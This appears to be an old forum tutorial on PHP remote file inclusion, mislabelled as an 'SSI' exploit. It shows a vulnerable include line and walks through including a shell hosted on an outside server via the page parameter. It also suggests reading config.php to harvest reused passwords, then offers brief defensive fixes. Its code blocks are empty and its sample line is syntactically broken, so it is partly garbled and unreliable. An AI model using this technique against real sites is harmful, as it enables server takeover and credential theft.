SSI Exploits (PHP Based) SSI Exploits. A really serious exploit to have present. Here's a typical example: http://www.host.com/index.php?page=links Not all links that look like these are exploitable. Here's an insecure and a secure version to acheive the same effect: Code: ------------------------------------- INSECURE CODE ------------------------------------- ------------------------------------- ------------------------------------- SECURE CODE ------------------------------------- ------------------------------------- Now you 'may' be looking at those two examples and wondering what's different, how one's secure and the other is not. Well the first one is insecure due to one line: Code: include($_GET['page'] '.php'); If you don't know what it's doing there i'll explain. It takes the variables from the URL (Uniform Resource Locator) which in this case is page (hence $_GET['page']). It then appends the '.php' extension on the end and includes the page. Here's how it should work: ## User visits - http://www.host.com/index.php?page=links ## Server Includes - /links.php Now this is all fine and well as long as someone clicks a link that exists. Now lets see what happens if it doesn't ## User visits - http://www.host.com/index.php?page=foo ## Server tries to include /foo.php but foo.php doesn't exist so it returns the following: Error: Warning: main(foo.php): failed to open stream: No such file or directory in /home/yourname/public_html/foo.php on line 4 Warning: main(): Failed opening 'foo.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/cpanel/3rdparty/lib/php') in /home/yourname/public_html/foo.php on line 4 This error will vary from host to host. Now this example is perfectly harmless now if we wanted to take advantage we could do something resembling this: ## Signup to a free webhosting account with no php support (Server will then not parse the php) ## Upload a php script which would perform the desired request. For example 'foo.php' containing: ## Execute the script via the URL - http://www.host.com/index.php?page=http://www.yourhost.com/foo ## Server includes http://www.yourhost.com/foo.php parsing any code in the file which in this case is a shell(providing server allows it) ## Final output output: -rw------- 1 0 1000 FEB 24 2003 index.php -rw------- 1 0 1000 FEB 24 2003 links.php -rw------- 1 0 1000 FEB 24 2003 affiliates.php -rw------- 1 0 1000 FEB 24 2003 pictures.php So now we can execute any php (possibly shell) on the webhost with the script running. Alot of website owners do something very stupid and use the same password for both their mysql and ftp. If you read a config.php you can usually get the password/passwords. The second example doesn't include anything that doesn't exist so it avoids this issue all together. Although a lot more lengthy it's a much better idea. There are other safe methods such as using file_exists() to check the file is present and simple regular expressions to filter characters. Hope this was a help to someone I started writing it for a PHP Security Article that I didn't get round to completing and thought someone mught find it of interest.. Feed back is welcome, - Insiszor[/b]